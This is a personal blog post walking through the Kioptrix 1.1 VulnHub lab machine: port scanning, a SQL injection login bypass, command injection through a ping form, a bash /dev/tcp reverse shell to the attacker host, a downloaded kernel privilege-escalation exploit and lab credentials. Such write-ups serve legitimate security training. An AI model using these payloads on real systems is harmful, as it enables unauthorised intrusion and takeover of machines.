<!DOCTYPE html>
<html lang="en" prefix="og: https://ogp.me/ns#">
<head>
<meta charset="UTF-8" />
<meta http-equiv="X-UA-Compatible"
      content="IE=edge">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0" />
<meta name="description"
      content="Adventures of Functional Mediocrity" />
<meta name="keywords"
      content="zola, theme, ink, hugo-ink, john tuyen, jtuyen" /> 

<title>John Tuyen | Kioptrix 1.1</title>
<meta
  property="og:title"
  content="John Tuyen | Kioptrix 1.1"
/>
<meta property="og:type" content="website" />
<meta property="og:url" content="https://johntuyen.com/posts/vulnhub-kioptrix11/" />
<meta property="og:description" content="Adventures of Functional Mediocrity" />
<meta property="og:image" content="" />
<meta property="og:image:url" content="" />
<meta property="og:image:secure_url" content="" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:title" content="Kioptrix 1.1" />
<meta name="twitter:description" content="Adventures of Functional Mediocrity" />
<meta property="twitter:image" content="" />

<link rel="alternate"
          type="application/rss+xml"
          title="John Tuyen"
          href="https://johntuyen.com/atom.xml">
    <link rel="preconnect"
          href="https://fonts.googleapis.com">
    <link rel="preconnect"
          href="https://fonts.gstatic.com"
          crossorigin>
    <!-- <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;700&family=Playfair+Display:wght@700&display=swap" rel="stylesheet">  -->
    <link href="https://fonts.googleapis.com/css2?family=Andada+Pro&display=swap&family=Playfair+Display"
          rel="stylesheet">
    <link rel="stylesheet"
          href="https://johntuyen.com/base.css">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/feather-icons/4.28.0/feather.min.js"
            integrity="sha512-7x3zila4t2qNycrtZ31HO0NnJr8kg2VI67YLoRSyi9hGhRN66FHYWr7Axa9Y1J9tGYHVBPqIjSE1ogHrJTz51g=="
            crossorigin="anonymous"></script>
</head>

<body>
    <header>
        <a class="site-name"
           href="/">
            <h1>John Tuyen</h1>
        </a>
        <div class="site-description">
            <p>Adventures of Functional Mediocrity</p>
        </div>
        <nav>
            <div class="links"> 
            <a 
                href="https://johntuyen.com/ ">About</a> 
            <a 
                href="https://johntuyen.com/posts/ ">Posts</a> 
            <a 
                href="https://johntuyen.com/gaze/ ">Gaze</a> 
            <a 
                href="https://johntuyen.com/wiretap/ ">Wiretap</a> 
            <a 
                href="https://johntuyen.com/tags/ ">Tags</a> 
            <a 
                href="https://johntuyen.com/search/ ">Search</a> 
            </div>
        </nav>
    </header>
    <article>
    

<section class="post">
  <div class="post-header">
    <div class="meta">
      <div class="date">
        <span class="day">01</span>
        <span class="rest">Feb 19</span>
      </div>
    </div>

    <div class="matter">
      <h1 class="title">Kioptrix 1.1 </h1>
    </div>
  </div>
    
  <article><ol>
<li>
<p>Ran <code>netdiscover</code> to discover the IP address of the machine.</p>
</li>
<li>
<p>Used nmap TCP scan:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">nmap -vv -Pn -A -sS -T4 -p- -oN</span><span> /root/tcpscan.txt 192.168.225.132
</span></code></pre>
</li>
<li>
<p>Used nmap UDP scan:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">nmap -vv -Pn -A -sU -T4 -p- -oN</span><span> /root/udpscan.txt 192.168.225.132
</span></code></pre>
</li>
<li>
<p>Used Firefox to navigate to port 80 and found a form asking for username and password.</p>
</li>
<li>
<p>Started enumeration process:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">dirb</span><span> http://192.168.225.132
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">nikto -h</span><span> 192.168.225.132
</span></code></pre>
<p>Used SQL injection bypass cheat sheet and successfully bypassed the form using:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">admin</span><span>&#39;</span><span style="color:#a3be8c;"> or </span><span>&#39;</span><span style="color:#bf616a;">1</span><span>&#39;</span><span style="color:#a3be8c;">=</span><span>&#39;</span><span style="color:#bf616a;">1
</span></code></pre>
<p><a href="https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/">https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/</a></p>
</li>
<li>
<p>Found another form that contains a ping tool. Used command injection to successfully run another command using:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">google.ca</span><span>;</span><span style="color:#bf616a;">cat</span><span> /etc/passwd
</span></code></pre>
</li>
<li>
<p>Getting shell access by refining the command injection - <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet</a></p>
<p>Setup netcat on Kali:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">nc -nvlp</span><span> 8080
</span></code></pre>
<p>Execute the command injection from browser:</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">localhost</span><span>;</span><span style="color:#bf616a;">bash -i </span><span>&gt;&amp; /dev/tcp/10.242.2.3/8080 </span><span style="color:#d08770;">0</span><span>&gt;&amp;</span><span style="color:#d08770;">1
</span></code></pre>
</li>
<li>
<p>Check account privileges - <a href="https://github.com/reider-roque/linpostexp">https://github.com/reider-roque/linpostexp</a></p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">wget</span><span> 10.242.2.3/linuxprivchecker.py
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">./linuxprivchecker.py
</span></code></pre>
</li>
<li>
<p><strong>FAIL</strong> - I got side tracked by trying to somehow edit the writable logwatcher cronjob with 777 permissions.</p>
</li>
<li>
<p>I dug around the system to see if I could find simple passwords.</p>
<p>Found password for MySQL user account <code>john:hiroshima</code> inside <code>index.php</code>.</p>
</li>
<li>
<p>Investigated the MySQL databases using john's account.</p>
<p>Found password for user account <code>root:hiroshima</code> account for MySQL. This was a fluke find as the hashes for John and Root account were the same.</p>
</li>
<li>
<p><strong>FAIL</strong> - Somehow I got the idea that I could try and escape to a root shell account from the MySQL command line</p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span>!</span><span style="color:#96b5b4;">\ </span><span style="color:#bf616a;">bash
</span></code></pre>
</li>
<li>
<p>After thinking hard about what to do next, I finally resorted to linux kernel 2.6.9 exploit - <a href="https://www.exploit-db.com/exploits/9479">https://www.exploit-db.com/exploits/9479</a></p>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">wget</span><span> 10.242.2.3/9479.c
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">gcc</span><span> 9479.c
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">./a.out
</span></code></pre>
</li>
<li>
<p>ROOTED MY FIRST BOX!</p>
</li>
</ol>
<h3 id="today-i-learned">Today I learned</h3>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">python -m</span><span> SimpleHTTPServer 80
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">php -S</span><span> localhost:80
</span></code></pre>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">python -c </span><span>&quot;</span><span style="color:#a3be8c;">import pty;pty.spawn(&#39;/bin/bash&#39;)</span><span>&quot;
</span></code></pre>
<ul>
<li>You can run shell commands in the MySQL command line.</li>
</ul>
<h3 id="improvement-for-next-time">Improvement for next time</h3>
<ul>
<li>Keep your enumeration scripts and any files you need to transfer between machines using <code>/var/www/html</code>. It will save time to always run python or php HTTP server. Remember to execute:</li>
</ul>
<pre data-lang="bash" style="background-color:#2b303b;color:#c0c5ce;" class="language-bash "><code class="language-bash" data-lang="bash"><span style="color:#bf616a;">service</span><span> apache2 start
</span></code></pre>
<ul>
<li>
<p>If you get baited into trying to modify full permission files/folders, do a quick simple test to see if you can edit the file/folder first.</p>
</li>
<li>
<p>Taking notes as I go. This is an ongoing process and I feel like I know where I could do better.</p>
</li>
</ul>
</article>

  
    
  
  <ul class="tags">
    
      <li><a href='https://johntuyen.com/tags/vulnhub'>vulnhub</a></li>
    
  </ul>
  
  
    
</section>
</article>
    <footer>
        <div class="social">
            <ul> 
                 
                <li>
                    <a href="https://github.com/jtuyen"
                       title="Github" rel="me"><i data-feather="github"></i></a>
                </li>
                 
                 
                <li>
                    <a href="https://twitter.com/jtuyen"
                       title="Twitter"
                       rel="me"><i data-feather="twitter"></i></a>
                </li>
                
                
                
                <li>
                    <a href="https://johntuyen.com/johntuyenprotonmailcom-pgp.asc" title="PGP" rel="me">
                        <i data-feather="lock"></i>
                    </a>
                </li>
                
                <li>
                    <a href="https://johntuyen.com/atom.xml"
                       title="John Tuyen"><i data-feather="rss"></i></a>
                </li>
            </ul>
        </div>
        <p> © John Tuyen 2024

        
        
        </p>
    </footer>
    <script>
        feather.replace();
    </script> 
    </body>
</html>